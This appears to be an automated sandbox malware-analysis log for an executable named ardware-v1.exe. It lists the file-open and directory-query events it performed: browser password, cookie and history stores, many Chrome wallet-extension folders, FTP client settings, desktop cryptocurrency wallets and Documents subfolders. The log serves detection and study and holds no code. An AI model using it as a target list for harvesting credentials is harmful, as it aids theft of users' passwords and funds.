Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpglif
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
